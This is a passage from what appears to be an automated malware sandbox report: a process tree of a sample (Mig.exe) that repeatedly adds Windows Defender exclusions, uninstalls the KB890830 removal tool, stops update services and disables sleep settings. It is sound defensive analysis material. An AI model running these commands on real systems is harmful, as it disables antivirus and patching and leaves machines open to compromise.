                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                          2⤵
                                                                                                                                            PID:7676
                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                              3⤵
                                                                                                                                                PID:6648
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                              2⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:6832
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                3⤵
                                                                                                                                                  PID:3532
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                2⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:8132
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                2⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:6484
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                                                2⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:7508
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                2⤵
                                                                                                                                                • Launches sc.exe
                                                                                                                                                PID:7732
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                2⤵
                                                                                                                                                • Power Settings
                                                                                                                                                PID:5136
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                2⤵
                                                                                                                                                • Power Settings
                                                                                                                                                PID:6256
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                2⤵
                                                                                                                                                • Power Settings
                                                                                                                                                PID:2564
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                2⤵
                                                                                                                                                • Power Settings
                                                                                                                                                PID:7396
                                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                                C:\Windows\system32\dialer.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:2540
                                                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                                                  C:\Windows\system32\dialer.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:6444
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                      3⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:5052
                                                                                                                                                    • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                      "C:\ProgramData\Mig\Mig.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:7684
                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                          4⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:7348
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                          4⤵
                                                                                                                                                            PID:7544
                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                              5⤵
                                                                                                                                                                PID:6524
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:6968
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:7144
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:7336
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:4012
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                              4⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:2648
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:4248
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:5476
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:6852
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                              4⤵
                                                                                                                                                              • Power Settings
                                                                                                                                                              PID:6276
                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4132
                                                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                                                dialer.exe
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:8352
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                3⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                PID:7512
                                                                                                                                                              • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                "C:\ProgramData\Mig\Mig.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:7360
                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:4060
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5940
                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:8964
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:4012
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:6772
                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:4240
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:6400
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:8436
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:8892
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:8300
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:5128
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:4524
                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Power Settings
                                                                                                                                                                          PID:8320
                                                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                                                          C:\Windows\system32\dialer.exe
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4248
                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                            dialer.exe
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5488
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:4252
                                                                                                                                                                          • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                            "C:\ProgramData\Mig\Mig.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:9180
                                                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:1876
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:6516
                                                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:8612
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:8048
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:4868
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:5640
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:8964
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:5940
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:8900
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:6572
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:8596
                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                    PID:5132
                                                                                                                                                                                  • C:\Windows\system32\dialer.exe
                                                                                                                                                                                    C:\Windows\system32\dialer.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1188
                                                                                                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                                                                                                      dialer.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6716
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      PID:736
                                                                                                                                                                                    • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                                      "C:\ProgramData\Mig\Mig.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2820
                                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          PID:8032
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:6644
                                                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:4880
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:4252
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:1100
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:784
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:1328
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:7156
                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                              PID:1520
                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                              PID:6596
                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                              PID:1924
                                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Power Settings
                                                                                                                                                                                              PID:7220
                                                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:6092
                                                                                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                dialer.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:8752
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:7900
                                                                                                                                                                                              • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                                                "C:\ProgramData\Mig\Mig.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6016
                                                                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                    PID:8580
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:8196
                                                                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:7648
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:6520
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:8452
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:6364
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:7424
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:6648
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:2816
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:6644
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:540
                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                        PID:1100
                                                                                                                                                                                                      • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                        C:\Windows\system32\dialer.exe
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:8112
                                                                                                                                                                                                        • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                          dialer.exe
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:7512
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:3484
                                                                                                                                                                                                        • C:\ProgramData\Mig\Mig.exe
                                                                                                                                                                                                          "C:\ProgramData\Mig\Mig.exe"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:3260
                                                                                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              PID:7004
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:784
                                                                                                                                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:1652
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                  PID:2536
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                  PID:2636
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                  PID:4092
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                  PID:5428
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                  PID:9036
                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                                                  PID:5024
                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                                                  PID:5956
                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                                                  PID:6516
                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                                                  PID:3800
                                                                                                                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                  C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:6400
                                                                                                                                                                                                                  • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                    dialer.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:768
                                                                                                                                                                                                                • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                  dialer.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:8620
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:6388
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1908
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:6656
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4252
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:4408
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:8752
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:540
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3084
